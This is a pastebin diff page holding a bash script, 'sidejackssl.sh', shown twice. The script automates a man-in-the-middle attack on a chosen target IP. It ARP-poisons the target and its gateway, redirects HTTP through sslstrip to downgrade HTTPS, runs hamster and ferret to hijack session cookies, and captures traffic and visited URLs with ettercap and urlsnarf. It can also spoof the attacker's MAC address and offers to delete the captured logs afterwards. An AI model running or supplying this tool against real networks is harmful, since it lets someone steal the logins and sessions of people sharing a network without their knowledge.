View difference between Paste ID: <a href="/SjHm7quG">SjHm7quG</a> and <a href="/post/view"></a>

View difference between Paste ID: SjHm7quG and

SHOW: | | - or go back to the newest paste.


#!/bin/bash

# sidejackssl.sh v0.1
# tested in backtrack 4 R2 environment, run as root.
# xterm used for window control
# arpspoof poisons a single victim and gateway
# ferret and hamster for sidejacking
# sslstrip for https
# ettercap for everything else
# urlsnarf to monitor visited urls
# firefox needs to be configured with a proxy of 127.0.0.1:1234
# url for hamster server is http://hamster
# by gorara

# a few variables (do not change)
m1="0"					# missing file var m1
m2="0"					# missing file var m2
m3="0"					# missing file var m3
m4="0"					# missing file var m4
quickclean="0"				# used for quick clean up
randmac="n"				# default setting do not randomize MAC
hamsterfile="hamster.txt"		# hamster output file (you can't change it)
trap 'cleanup' SIGINT SIGTERM		# detect control-c

# a few more variables (change these if required)

# xterm window variables
x="0"					# x offset value
y="0"					# y offset value
width="120"				# width value
height="7"				# height value
yoffset="120"				# y offset
fgcolor="white"				# foreground color
bgcolor="black"				# background color

# style variables
warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
inputstyle="[\e[01;30m?\e[00m]"		# input msgs style

# file variables
sslstripfile="sslstrip.log"		# sslstrip output file name
snifffile="sniff-*"			# hamster sniff file wildcard
etterfile="etter.cap"			# ettercap output cap file
temp="/tmp"				# temporary dir

function usage
{
	clear
	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
	echo ""
	echo "	-i interface	interface to use, ex. eth0, wlan0."
	echo "	-t target	the target IP address."
	echo "	-g gateway	the gateway IP address."
	echo "	-r		randomize your MAC address,"
	echo "			only use for wired interfaces."
	echo "	-h		display this help screen."
	echo ""
	echo "	examples: "
	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
	echo ""
	exit 0
}

function cleanup() {
echo -e "\n$warnstyle control-c pressed! "

# exit script if nothing has been modified
if [[ "$quickclean" = "1" ]]; then
echo -e "$infostyle nothing changed, all done!"
exit 0
fi

echo -e "$infostyle cleaning up..."
echo -e "$execstyle flushing iptables..."
iptables -F
iptables -t nat -F

echo -e "$execstyle turning off IP forwarding..."
echo "0" > /proc/sys/net/ipv4/ip_forward

# change back MAC address to orignal one
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
echo -e "$execstyle resetting MAC address...";
echo -e "$infostyle original MAC is: $origmac"
ifconfig $interface down
ifconfig $interface hw ether $origmac
ifconfig $interface up
	if [ -z $gw ]; then
	echo -e "$warnstyle WARNING, you have no default gateway!"
	else
	route add default gw $gw
	fi
rm $temp/mac.orig
rm $temp/gw.orig
fi

echo -e "$execstyle cleaning up files..."
echo -e "$infostyle temp directory: "

# testing to see if files exist, if so display them...
	if [ -f $temp/$sslstripfile ]; then
	ls $temp/$sslstripfile
	else
	#echo -e "$warnstyle missing $sslstripfile"
	m1="1"
	fi

	if [ -f $temp/$etterfile ]; then
	ls $temp/$etterfile
	else
	#echo -e "$warnstyle missing $etterfile"
	m2="1"
	fi

echo -e "$infostyle current directory: "

	if [ -f $snifffile ]; then
	ls $snifffile
	else
	#echo -e "$warnstyle missing $snifffile"
	m3="1"
	fi

	if [ -f $hamsterfile ]; then
	ls $hamsterfile
	else
	#echo -e "$warnstyle missing $hamsterfile"
	m4="1"
	fi

# testing to see if there are any files at all
if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then

while [[ "$delete" != "y" || "$delete" != "n" ]]

echo -en "$infostyle delete file(s)? [y/n]: " 
read delete

do
    case "$delete" in
        y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
	n) echo -e "$warnstyle nothing deleted!"; break;;
    	*) echo -e "$warnstyle wrong selection!";
    esac
done

# delete files as requested
if [[ "$delete_marker" = "y" ]]; then
	if [ -f $temp/$sslstripfile ]; then
	rm $temp/$sslstripfile
	fi

	if [ -f $temp/$etterfile ]; then
	rm $temp/$etterfile
	fi

	if [ -f $snifffile ]; then
	rm $snifffile
	fi

	if [ -f $hamsterfile ]; then
	rm $hamsterfile
	fi
fi

else

	echo -e "$warnstyle nothing to delete!"
fi

echo -e "$infostyle all done!"
exit 0
}


# start main program
if [ "$#" -eq 0 ]; then
usage
fi

while [ "$#" -gt 0 ]
do
    case "$1" in
        -i)  interface=$2; shift 1;;
	-r)  randmac="y"; shift 1;;
	-t)  target=$2; shift 1;;
	-g)  gateway=$2; shift 1;;
	-h)  usage;;
	-*)  usage; break;;
	*)  break;;
    esac
    shift
done

# required parameters
if [[ -z $interface || -z $target || -z $gateway ]]; then
usage
exit 0
fi

clear

if [[ "$randmac" = "y" ]]; then
mac="yes"
else
mac="no"
fi

# set quick cleanup flag
quickclean="1"

echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
echo -e "$infostyle ctrl-c to abort at any time."
echo -e "$infostyle attack summary:"
echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"

if [[ "$randmac" = "y" ]]; then 

echo -e "$execstyle change of $interface MAC address requested."

if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
echo -e "$infostyle wireless device detected..." 
echo -e "$warnstyle can't change MAC address without taking wifi interface down"
echo -e "$warnstyle do it manually before connecting to the AP."
exit 0
fi

if [[ "$interface" = eth* ]]; then
echo -e "$infostyle wired device detected..." 
echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
echo -en "$inputstyle do you want to continue? [y/n]: "
read continue
	if [[ "$continue" = "y" ]]; then
	echo -e "$infostyle proceeding..."
	else
	echo -e "$infostyle exiting..."
	exit 0	
	fi
fi

origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`

fi

# before this, ctrl-c will exit script without doing anything.
quickclean="0"

# use macchanger to randomize MAC address, ect.
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
echo -e "$execstyle randomizing MAC address...";
gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
ifconfig $interface down
macchanger -r $interface > $temp/mac.orig
ifconfig $interface up
	if [ -z $gw ]; then
	echo -e "$warnstyle WARNING, you have no default gateway!"
	else
	route add default gw $gw
	fi
origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
echo -e "$infostyle original MAC is: $origmac"
echo -e "$infostyle faked    MAC is: $fakemac"
fi

echo -e "$execstyle turning on IP Forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward

echo -e "$execstyle configuring iptables..."
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 1

echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
sleep 2

echo -e "$execstyle starting ferret   ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
sleep 2

echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
sleep 2

echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
sleep 2

echo -e "$execstyle starting urlsnarf ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
sleep 2

echo -e "$infostyle trap is ready, now to direct traffic..."

echo -e "$execstyle ARP poisoning the target..."
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
sleep 1

echo -e "$infostyle run firefox and type http://hamster"
echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
echo -e "$infostyle press ctrl-c to exit and clean up... \n"
for ((;;)) do 
read loop
echo -en "$infostyle press ctrl-c to terminate!"
done

exit 0

1	-
1	+	#!/bin/bash
2
3		# sidejackssl.sh v0.1
4		# tested in backtrack 4 R2 environment, run as root.
5		# xterm used for window control
6		# arpspoof poisons a single victim and gateway
7		# ferret and hamster for sidejacking
8		# sslstrip for https
9		# ettercap for everything else
10		# urlsnarf to monitor visited urls
11		# firefox needs to be configured with a proxy of 127.0.0.1:1234
12		# url for hamster server is http://hamster
13		# by gorara
14
15		# a few variables (do not change)
16		m1="0" # missing file var m1
17		m2="0" # missing file var m2
18		m3="0" # missing file var m3
19		m4="0" # missing file var m4
20		quickclean="0" # used for quick clean up
21		randmac="n" # default setting do not randomize MAC
22		hamsterfile="hamster.txt" # hamster output file (you can't change it)
23		trap 'cleanup' SIGINT SIGTERM # detect control-c
24
25		# a few more variables (change these if required)
26
27		# xterm window variables
28		x="0" # x offset value
29		y="0" # y offset value
30		width="120" # width value
31		height="7" # height value
32		yoffset="120" # y offset
33		fgcolor="white" # foreground color
34		bgcolor="black" # background color
35
36		# style variables
37		warnstyle="[\e[01;38mw\e[00m]" # warning msgs style
38		execstyle="[\e[01;32mx\e[00m]" # execute msgs style
39		infostyle="[\e[01;34mi\e[00m]" # informational msgs style
40		inputstyle="[\e[01;30m?\e[00m]" # input msgs style
41
42		# file variables
43		sslstripfile="sslstrip.log" # sslstrip output file name
44		snifffile="sniff-*" # hamster sniff file wildcard
45		etterfile="etter.cap" # ettercap output cap file
46		temp="/tmp" # temporary dir
47
48		function usage
49		{
50		clear
51		echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
52		echo ""
53		echo " -i interface interface to use, ex. eth0, wlan0."
54		echo " -t target the target IP address."
55		echo " -g gateway the gateway IP address."
56		echo " -r randomize your MAC address,"
57		echo " only use for wired interfaces."
58		echo " -h display this help screen."
59		echo ""
60		echo " examples: "
61		echo " bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
62		echo " bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
63		echo ""
64		exit 0
65		}
66
67		function cleanup() {
68		echo -e "\n$warnstyle control-c pressed! "
69
70		# exit script if nothing has been modified
71		if [[ "$quickclean" = "1" ]]; then
72		echo -e "$infostyle nothing changed, all done!"
73		exit 0
74		fi
75
76		echo -e "$infostyle cleaning up..."
77		echo -e "$execstyle flushing iptables..."
78		iptables -F
79		iptables -t nat -F
80
81		echo -e "$execstyle turning off IP forwarding..."
82		echo "0" > /proc/sys/net/ipv4/ip_forward
83
84		# change back MAC address to orignal one
85		if [[ "$randmac" = "y" \|\| "$randmac" = "Y" ]]; then
86		echo -e "$execstyle resetting MAC address...";
87		echo -e "$infostyle original MAC is: $origmac"
88		ifconfig $interface down
89		ifconfig $interface hw ether $origmac
90		ifconfig $interface up
91		if [ -z $gw ]; then
92		echo -e "$warnstyle WARNING, you have no default gateway!"
93		else
94		route add default gw $gw
95		fi
96		rm $temp/mac.orig
97		rm $temp/gw.orig
98		fi
99
100		echo -e "$execstyle cleaning up files..."
101		echo -e "$infostyle temp directory: "
102
103		# testing to see if files exist, if so display them...
104		if [ -f $temp/$sslstripfile ]; then
105		ls $temp/$sslstripfile
106		else
107		#echo -e "$warnstyle missing $sslstripfile"
108		m1="1"
109		fi
110
111		if [ -f $temp/$etterfile ]; then
112		ls $temp/$etterfile
113		else
114		#echo -e "$warnstyle missing $etterfile"
115		m2="1"
116		fi
117
118		echo -e "$infostyle current directory: "
119
120		if [ -f $snifffile ]; then
121		ls $snifffile
122		else
123		#echo -e "$warnstyle missing $snifffile"
124		m3="1"
125		fi
126
127		if [ -f $hamsterfile ]; then
128		ls $hamsterfile
129		else
130		#echo -e "$warnstyle missing $hamsterfile"
131		m4="1"
132		fi
133
134		# testing to see if there are any files at all
135		if [[ $m1 -eq 0 \|\| $m2 -eq 0 \|\| $m3 -eq 0 \|\| $m4 -eq 0 ]]; then
136
137		while [[ "$delete" != "y" \|\| "$delete" != "n" ]]
138
139		echo -en "$infostyle delete file(s)? [y/n]: "
140		read delete
141
142		do
143		case "$delete" in
144		y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
145		n) echo -e "$warnstyle nothing deleted!"; break;;
146		*) echo -e "$warnstyle wrong selection!";
147		esac
148		done
149
150		# delete files as requested
151		if [[ "$delete_marker" = "y" ]]; then
152		if [ -f $temp/$sslstripfile ]; then
153		rm $temp/$sslstripfile
154		fi
155
156		if [ -f $temp/$etterfile ]; then
157		rm $temp/$etterfile
158		fi
159
160		if [ -f $snifffile ]; then
161		rm $snifffile
162		fi
163
164		if [ -f $hamsterfile ]; then
165		rm $hamsterfile
166		fi
167		fi
168
169		else
170
171		echo -e "$warnstyle nothing to delete!"
172		fi
173
174		echo -e "$infostyle all done!"
175		exit 0
176		}
177
178
179		# start main program
180		if [ "$#" -eq 0 ]; then
181		usage
182		fi
183
184		while [ "$#" -gt 0 ]
185		do
186		case "$1" in
187		-i) interface=$2; shift 1;;
188		-r) randmac="y"; shift 1;;
189		-t) target=$2; shift 1;;
190		-g) gateway=$2; shift 1;;
191		-h) usage;;
192		-*) usage; break;;
193		*) break;;
194		esac
195		shift
196		done
197
198		# required parameters
199		if [[ -z $interface \|\| -z $target \|\| -z $gateway ]]; then
200		usage
201		exit 0
202		fi
203
204		clear
205
206		if [[ "$randmac" = "y" ]]; then
207		mac="yes"
208		else
209		mac="no"
210		fi
211
212		# set quick cleanup flag
213		quickclean="1"
214
215		echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
216		echo -e "$infostyle ctrl-c to abort at any time."
217		echo -e "$infostyle attack summary:"
218		echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
219
220		if [[ "$randmac" = "y" ]]; then
221
222		echo -e "$execstyle change of $interface MAC address requested."
223
224		if [[ "$interface" = wlan* \|\| "$interface" = wifi* \|\| "$interface" = ath* ]]; then
225		echo -e "$infostyle wireless device detected..."
226		echo -e "$warnstyle can't change MAC address without taking wifi interface down"
227		echo -e "$warnstyle do it manually before connecting to the AP."
228		exit 0
229		fi
230
231		if [[ "$interface" = eth* ]]; then
232		echo -e "$infostyle wired device detected..."
233		echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
234		echo -en "$inputstyle do you want to continue? [y/n]: "
235		read continue
236		if [[ "$continue" = "y" ]]; then
237		echo -e "$infostyle proceeding..."
238		else
239		echo -e "$infostyle exiting..."
240		exit 0
241		fi
242		fi
243
244		origmac=`ifconfig $interface \| grep HWaddr \| awk {'print $5'}`
245
246		fi
247
248		# before this, ctrl-c will exit script without doing anything.
249		quickclean="0"
250
251		# use macchanger to randomize MAC address, ect.
252		if [[ "$randmac" = "y" \|\| "$randmac" = "Y" ]]; then
253		echo -e "$execstyle randomizing MAC address...";
254		gw=`route -n \| grep UG \| awk {'print $2'}` > $temp/gw.orig
255		ifconfig $interface down
256		macchanger -r $interface > $temp/mac.orig
257		ifconfig $interface up
258		if [ -z $gw ]; then
259		echo -e "$warnstyle WARNING, you have no default gateway!"
260		else
261		route add default gw $gw
262		fi
263		origmac=`cat $temp/mac.orig \| grep Current \| awk {'print $3'}`
264		fakemac=`cat $temp/mac.orig \| grep Faked \| awk {'print $3'}`
265		echo -e "$infostyle original MAC is: $origmac"
266		echo -e "$infostyle faked MAC is: $fakemac"
267		fi
268
269		echo -e "$execstyle turning on IP Forwarding..."
270		echo "1" > /proc/sys/net/ipv4/ip_forward
271
272		echo -e "$execstyle configuring iptables..."
273		iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
274		sleep 1
275
276		echo -e "$execstyle starting hamster ... <logging to: $hamsterfile>"
277		xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
278		sleep 2
279
280		echo -e "$execstyle starting ferret ... <logging to: console>"
281		y=$(($y+$yoffset))
282		xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
283		sleep 2
284
285		echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
286		y=$(($y+$yoffset))
287		xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
288		sleep 2
289
290		echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
291		y=$(($y+$yoffset))
292		xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
293		sleep 2
294
295		echo -e "$execstyle starting urlsnarf ... <logging to: console>"
296		y=$(($y+$yoffset))
297		xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
298		sleep 2
299
300		echo -e "$infostyle trap is ready, now to direct traffic..."
301
302		echo -e "$execstyle ARP poisoning the target..."
303		y=$(($y+$yoffset))
304		xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
305		sleep 1
306
307		echo -e "$infostyle run firefox and type http://hamster"
308		echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
309		echo -e "$infostyle press ctrl-c to exit and clean up... \n"
310		for ((;;)) do
311		read loop
312		echo -en "$infostyle press ctrl-c to terminate!"
313		done
314
315		exit 0